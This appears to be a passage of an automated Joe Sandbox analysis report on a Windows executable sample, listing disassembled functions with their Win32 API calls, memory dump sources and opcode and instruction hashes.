                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow$_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2875217250-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                                                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • select.WSOCK32 ref: 0045890A
                                                                                                                                                                                                                                                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                                                                                                                                                                                                                                                                                                • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 385091864-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1358664141-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1187119602-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
